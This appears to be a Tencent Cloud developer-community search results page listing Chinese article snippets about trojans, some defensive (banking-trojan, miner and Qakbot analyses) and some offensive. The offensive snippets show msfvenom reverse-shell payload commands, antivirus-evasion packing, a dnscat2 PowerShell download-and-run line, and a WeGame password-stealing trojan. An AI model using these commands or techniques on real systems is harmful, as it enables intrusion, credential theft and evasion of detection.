- 综合排序
- 最热优先
- 最新优先
- 来自专栏全栈程序员必看
trojangeneric木马_kali木马绑定app
Kworker 木马,如果发现root 权限计划任务有以下这种非常规任务,说明已经中招成了矿机 Dt 环境,大家要注意,切莫随便给开放端口。
2K40编辑于 2022-11-08 - 来自专栏用户10781703的专栏
浅谈木马
2.木马原理、结构 原理:特洛伊木马是一道程序,藏匿于计算机中,通过对开启计算机的某一端口进行监听,在接受到数据后进行识别,再对计算机执行相应的操作。 (2)服务器端 服务器端程序 服务器端程序即木马程序,它隐藏安装在目标主机上,目标主机也称为肉鸡。 二、制作简易木马 此处我们利用msfvenom制作木马程序。 三、木马的危害 由于本文探讨木马远控,这里就暂时省略文件上传、命令执行下载木马等方式将木马传入目标主机的讨论。 1.木马的传播途径 (1)利用下载进行传播 (2)利用系统漏洞传播 (3)利用邮件传播 (4)利用即使通信传播 (5)利用网页传播 (6)利用蠕虫病毒传播等 2.木马的防范与查杀 (1)首先安装杀毒软件 (2)不执行奇怪的软件,使用的软件尽量从官方下载安装 (3)不随便打开奇怪的邮件 (4)尽量少使用或者不使用共享文件夹 (5)不点击奇怪的链接等 本文只是简单讨论下木马远控,为了提高自己和身边亲友的安全意识
1.6K20编辑于 2023-10-10 - 来自专栏FreeBuf
Kronos银行木马被发现,疑似新版Osiris木马
根据Proofpoint安全研究人员的说法,新版本的Kronos银行木马正蠢蠢欲动,研究人员证实,最近三次宣传这个旧木马的翻新版本在2014年经历了鼎盛时期。 Kronos 2018版可能是新版Osiris木马 研究人员说,与此同时,这种新的Kronos变种开始出现在他们的雷达上,一名恶意软件作者开始在黑客论坛上宣传一种新的银行木马,他称之为Osiris。 最大的线索是这个新特洛伊木马的作者声称他的木马只有350 KB大小,接近于早期Kronos 2018版样本——研究人员4月份发现的(351 KB)大小。
1.6K50发布于 2018-07-31 - 来自专栏白安全组
挖矿木马详解
一分钟了解什么是挖矿木马 什么是挖矿木马? 门罗币交易价格可观; 2. 门罗币是一种匿名币,安全性更高; 3. 门罗币的算法通过计算机CPU和GPU即可进行运算,不需要其他特定的硬件支持; 4. 是否使用了全盘查杀,很多情况下安全软件的快速查杀只查杀特定目录; 2. 由于目前的杀毒软件都不会清理数据库中的内容,如发现主机感染Mykings木马,应及时联系专业的安全人员进行排查和处置。 加固与防护 安全软件 1. 安装杀毒软件; 2. 及时更新病毒库; 3. 主机和数据库都要避免使用弱口令; 2. 避免多个设备使用相同口令。 漏洞管理 1. 定期对系统进行漏洞扫描,及时修复漏洞,特别是挖矿木马常用的“永恒之蓝”漏洞; 2.
13.5K61发布于 2019-12-02 - 来自专栏黑客技术家园
木马盗号《一》
这一节主要给大家分享的是黑客是如何利用木马进行盗号的。 久前看了一些安全方面的书籍。在看完了《计算机病毒揭秘与对抗》---王倍昌书 以后,打算找个目标试试手。 但是这样就不太真实,自己写的小程序显然没有防御措施,模拟不了真实环境,体会不到写盗号木马的乐趣-。-! 后面的实战环节就会碰到一些问题,后面我会说明。 由于本次只是木马主要功能原理介绍,所以我并不介绍木马怎么隐藏、怎么绕过360防御(本文木马很容易被杀毒软件查杀)进行免杀。(-。-/主要我还没看。O(∩_∩)O)。 目标: 使用感染方式感染WeGame关键程序(主要是2个EXE,一个是账号相关还有一个是密码相关),达到每当用户通过键盘按键方式(本文对于直接登陆等其他方式无效)输入账号、密码时,可以自动发送账号 对于本次盗号木马,我觉得通过病毒感染的插入方式进行代码运行比较好。当然也可以进行捆绑,可以另起一个DLL,或者服务等等。但是插入式首先目标定位精准,因为他只影响WeGame。
1.9K30发布于 2021-04-02 - 来自专栏黑客技术家园
木马盗号《三》
背景: 上一篇 WeGame盗号木马之旅(二) 我们实现了键盘按键模拟驱动的开发,这篇我们实现下具体注入代码的编写。 目标: 具体的注入代码编写。实现账号获取和密码获取。 1char cBuffer[48] = { 0 };//0 2char* pUser32 = "C:\\Windows\\System32\\user32.dll";//30 char* pWS2_32 char* psend = "send";//2D0 char* pclosesocket = "closesocket";//300 char* pWSACleanup = "WSACleanup" 360 HHOOK gHook;//364 PBYTE pKernalBaseMem = NULL;//368 HANDLE hUser32Handle = NULL;//36C HANDLE hWS2_ //jump T3 inc ebx;//指向下一个字符 cmp ebx,0Dh;//判断是否到了字符串尾 jne 0x004F0087;//jump T2
2K20发布于 2021-04-02 - 来自专栏黑客技术家园
木马盗号《二》
看完了第一篇 WeGame盗号木马之旅(一) ,相信读者已经大概明白了我们需要干什么。 四、编写具体的病毒EXE,实现感染目标EXE并注入我们编写的木马代码。 他介绍了PS/2键盘的底层工作原理。下面我简单说明一下原理:不像直接通过WIN32 API模拟发送消息,我们直接通过访问键盘端口进行模拟。当我们在键盘上按下一个键时,会产生一个中断。 变成下一个字符的扫描码 pQueueContext->isSpace = TRUE; } else {//删除按键 //端口读写 WRITE_PORT_UCHAR((PUCHAR)0X64, 0XD2) 说明即将发送数据 WRITE_PORT_UCHAR((PUCHAR)0X60, 0X0E);//按键按下模拟,Backspace WRITE_PORT_UCHAR((PUCHAR)0X64, 0XD2)
2K30发布于 2021-04-02 - 来自专栏黑客技术家园
木马盗号《四》
目标: 实现服务端的代码编写,用于接受木马发回的消息。 实现: 由于这一篇实现任务比较简单,我就讲一下密码的消息接收,账号类似。 之后就是简单的字符接收就OK了O(∩_∩)O 代码如下: #define WIN32_LEAN_AND_MEAN #include<windows.h> #include<Winsock2.h > #include<stdio.h> #pragma comment(lib,"Ws2_32.lib") //用于消息定位输出 void gotoxy(int x, int y) { COORD pos pos);//两个参数分别是指定哪个窗体,具体位置 } void main() { WSADATA wsaData; int state = 0; if (WSAStartup(MAKEWORD(2, 2), &wsaData)) { printf("套接字初始化失败!
1K40发布于 2021-04-02 - 来自专栏FreeBuf
来自云端的木马:“百家”木马集团分析
2)以直接通过查询远程数据库的方式获取配置信息,减少了不少工作量,但暴露了数据库的帐号密码。 3)篡改本地受信任数字证书列表,并构造证书给木马签名,逃避查杀。 ? 0×01木马文件概况 ? 2)得到id后,直接连接远程数据库,数据库地址、用户名、密码加密内置于木马文件中。 ? 3)连接成功后直接通过id查询木马此id对应的配置信息。 ? ? 2、PlayLoad分析 该木马根据不同的id,可以下载执行多大60多中不同的PlayLoad,经抽样分析,这些不同的PlayLoad大多为Gh0st远程控制木马,每个木马的有着不同的C&C服务器,应该是不同的使用者所使用 2)释放winlogopc.exe、DULIB.DLL两个文件到System32目录组成白加黑,并执行winlogopc.exe,winlogopc.exe为联想相关文件,为白文件。 ? 0×03后记: 经过对木马加载器的详细分析和配置信息的猜测解读,做出如下图猜测,木马作者负责木马的免杀(同一个文件),并通过SQL Server上的配置信息来管理和销售木马,每卖出一个木马作者便为牧马人开立一个帐号
1.7K70发布于 2018-02-08 - 来自专栏七夜安全博客
教你学木马攻防 | 隧道木马 | ICMP反弹shell
前言 前文回顾: 教你学木马攻防 | 隧道木马 | 第一课 在上一篇文章中,我们讲解了木马中常用的端口转发技术,这一节讲解一下木马通信协议中的ICMP协议,并通过ICMP实现一个反弹shell。 第四节 最后 推荐阅读: Python RASP 工程化:一次入侵的思考 教你学木马攻防 | 隧道木马 | 第一课 一个Python开源项目-哈勃沙箱源码剖析(下)
4.4K30发布于 2019-03-19 - 来自专栏全栈程序员必看
远程控制木马原理_安卓远程控制木马
导读: 刘东发(http://www.codelive.net)的杰作——–远程控制木马”偷窥者”VC6.0编译通过。2001年是中国的木马大丰收的一年. 这是一款VC++编写的木马,同时是世界上第一款结束杀毒软件进程(金山毒霸)的木马。这是木马发展史上的一个里程碑。之后许多木马/病毒都增加了这一功能。不过,它也不是开放源代码的。 1.可以偷窥到对方的桌面内容,按设置的时间进行刷新. 2.可以用鼠标控制对方的电脑,包括所有的鼠标操作. 3.可以使用键盘控制对方的电脑,几乎可用所有的按键. 4.在客户端可以建立多个窗口 2001/11/12 : 偷窥者 Ver1.5(发行版),包括客户端和服务端,无源程序. 1.增加了几种压缩算法,如:LZW(推荐使用)、LZSS、LZ77等. 2. 对服务器端部分功能进行了完善. 2001/10/31 : 偷窥者 Ver1.2(发行版),包括客户端和服务端,无源程序. 1.增加了存储和读取配置的功能. 2.
2.4K20编辑于 2022-11-15 - 来自专栏全栈程序员必看
木马免杀方式_木马入侵的常见方法
前言 免杀,又叫免杀毒技术,是反病毒,反间谍的对立面,是一种能使病毒或木马免于被杀毒软件查杀的软件。它除了使病毒木马免于被查杀外,还可以扩增病毒木马的功能,改变病毒木马的行为。 /reverse_tcp LHOST=192.168.111.132 LPORT=8888 -f exe > weixin.exe 2、部署一下kali上的apache服务,令目标机器能够访问下载我们生成的木马 2、MSF编码 在metasploit框架下免杀的方式之一是msf编码器,功能是使用msf编码器对我们制作的木马进行重新编码,生成一个二进制文件,这个文件运行后,msf编码器会将原始程序解码到内存中并执行 1、在kali终端输入 msfvenom -l encoders,这可以列出所有可用的编码格式 2、在msf的/data/templates/下有很多metasploit自带的用于捆绑木马的程序模板, 它首先可执行文件中的可执行数据解压出来,然后将解压缩用的代码附加在前面 运行的时候:将原本的可执行数据解压出来,然后再运行解压缩后的数据 1、在kali中内置了upx打包器,输入upx可以看下参数介绍 2、
2.4K40编辑于 2022-09-25 - 来自专栏七夜安全博客
教你学木马攻防 | 隧道木马 | DNS反弹shell
DNS反弹shell 在上一篇文章中,我们讲解了木马通信协议中的ICMP协议,并通过ICMP实现了一个反弹shell,本篇接着讲解一下DNS隧道,也实现一个反弹shell。 ? https://github.com/lukebaggett/dnscat2-powershell 在云服务器xxx.xxx.xxx.xxx上安装Dnscat2服务端,步骤如下: # apt-get git # cd dnscat2/server # bundle install 安装完成后,在dnscat2/server目录下运行server端: ruby . --no-cache,请务必在运行服务器时添加无缓存选项,因为powershell-dnscat2客户端与dnscat2服务器的caching模式不兼容。 执行完命令效果如下: ? powershell/master/dnscat2.ps1'); Start-Dnscat2 -Domain c.aaa.com -PreSharedSecret dnsvirus} -Domain参数需要指定你设置的
4.2K30发布于 2019-04-28 - 来自专栏FreeBuf
Ghimob银行木马分析
Guildma是Tétrade银行木马家族中的一员,它活动频繁并处于持续开发状态。 当攻击者进行交易时,木马会利用WebView覆盖主屏幕或全屏打开某个网站,在用户查看屏幕时,攻击者会在后台使用金融应用程序执行交易。 远程控制 安装完成后Ghimob会隐藏应用程序图标,解密硬编码的C2列表,并访问所有C2来接收真实的C2地址。 在分析的样本中,C2提供程序都是相同的,但真实的C2在不同样本之间有所不同,所有的通信都是通过HTTP / HTTPS协议完成。 ? 4a7e75a8196622b340bedcfeefb34fff 4b3743373a10dad3c14ef107f80487c0 4f2cebc432ec0c4cf2f7c63357ef5a16 原文链接
1.2K30发布于 2020-12-08 - 来自专栏kayden
基于github的木马
---- 基于github的木马 前言 《Python黑帽子:黑客与渗透测试编程之道》的读书笔记,会包括书中源码,并自己将其中一些改写成Python3版本。 书是比较老了,anyway,还是本很好的书 本篇是第7章基于github的木马 1、github的配置 如下命令,搭建一个chapter7项目 2、创建模块 在modules目录下创建一个dirlister.py return str(files) 一个environment.py获取木马所在远程机器上的所有环境变量 #! [ { "module":"dirlister" }, { "module":"environment" } ] 同样推送 4、编写基于github通信的木马 该木马从github module_runner(module): # 将1加入到队列中 task_queue.put(1) result = sys.modules[module].run(a=1,b=2,
98310编辑于 2022-09-29 - 来自专栏白安全组
木马基础伪装学习
第一个里面选择一个正常的exe程序,然后第二个选择我们的木马文件,最后会生成出带有签名的exe文件,当然这个签名并不是真的,只是有真实签名的内容,但是本质不守承认,有部分杀软不会检测签名详细情况。 进行信息伪装,也就是将exe文件的基本信息变为其他程序的,比如我这里通过拷贝360的所有内容进行伪装 工具注册码: 用户名是 JuNoS 激活码: eTM0afo7NHb+LdpcduPV4OOXfY2mppIQDxhdusa-qFG8sNfUCMIH6zNZI0M9L9Wuj46ROqd7soWDLinqUepIo2Z63YIaBvjuC2R7MeLBla8MhVNOIMn742RgMQh0ApZ2SJ5kIyYHpPhgcW5zu7R1 -j5aenV2paLGFv5Z3lZM7KY 首先我们将木马文件拖入进去,然后再拖入360程序,很简单,我们只需要将360下面的所有文件夹拖到上面的木马中,然后右击上面木马文件另存为即可,之后木马文件所有表面信息都是
22200编辑于 2025-06-16 - 来自专栏网络安全与可视化
如何检测Qakbot木马
首先需要了解如下内容 Qakbot:一个活跃的银行木马 Cobalt Strike:一款商业渗透测试工具,不幸的是,Cobalt Strike的盗版已经被泄露。 鼠标悬停显示IP地址10.12.7.101,单击圆圈打开主机信息页面: image.png 从上图我们可以得到如下信息: 1、主机是Windows 8客户端; 2、主机作为客户端的安全评分为19905, 2、TLS证书是自签名的:红色标志。没有信誉良好或专业的服务会使用自签名证书进行外部/ Internet通信。此外,TLS颁发者和主题字段为空,红色标记变大了。 image.png 虽然被列入黑名单的JA3并不是Qakbot,但我们刚刚发现,这台主机感染了Gozi银行木马。 结论 即使是用于分析记录的网络流量,ntopng还是帮助您大致了解网络情况的好方法。
1.3K30发布于 2021-04-08 - 来自专栏Cyber Security
文件关联型木马
也就是对某种文件类型(区分于文件拓展名)默认打开方式 使用文件关联实现木马自启动进行权限维持 将木马与某一种类型的文件或程序关联在一起,当打开文件或程序被运行是,木马也悄悄伴随着运行 msfvenom实现绑定程序 windows/meterpreter_reverse_tcp LHOST={公网IP} LPORT={公网端口} -f exe -o payload -i 5 -x {捆绑对象}.exe 修改注册表 执行木马的同时执行文件
27210编辑于 2024-07-18 - 来自专栏FreeBuf
Android木马分析简介
要分析的木马是一个2013年的syssecApp.apk,这个木马的分析能对Android恶意软件有个大概了解。 2 –分析工具 2.1Dexter Dexter可以将Android应用上传做分析,提供了包和应用元数据的介绍。包的依赖关系图显示了所有包的关系,可以快速打开列表显示所有的class和功能。 2.4 Dex2Jar 可将dex 文件转成 Java 类文件的工具,即使你是经验丰富的逆向工程师,也可以考虑使用。 action=result&task_id=1a6d8d21d7b0c1a04edb2c7c3422be72f&format=html ? 3.2 Dexter 包的依赖关系图显示共有四个。 onBoot在启动的时候就会进行闹铃,SmsReceiver和alarmReceiver则是真正的木马,在任何一个短信到达的时候SmsReceiver会检查里面是否包含有”bank”,如果是则使用abortBroadcast
1.8K90发布于 2018-02-02 - 来自专栏FreeBuf
Mispadu银行木马分析
写在前面的话 近期,研究人员观察到了大量网络诈骗活动,通过分析之后,很多线索直指URSA/Mispadu银行木马,趋势科技将该木马标记为了TrojanSpy.Win32.MISPADU.THIADBO。 研究人员表示,Mispadu银行木马能够在感染目标用户系统之后,窃取用户的凭证信息。 木马活动分析 针对Mispadu的攻击目标,Mispadu的入口向量为垃圾邮件,这跟很多其他的恶意软件活动非常相似。 最后,VBScript还会家在AutoIT文件,这个文件负责将最终的Payload加载到目标设备的内存中,即一个包含了木马程序代码和进程的Delphi文件。 木马病毒是网络犯罪分子用来窃取银行系统用户凭证的工具之一,而垃圾邮件就是这些恶意软件最主要的传播途径。
60210编辑于 2023-04-26
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号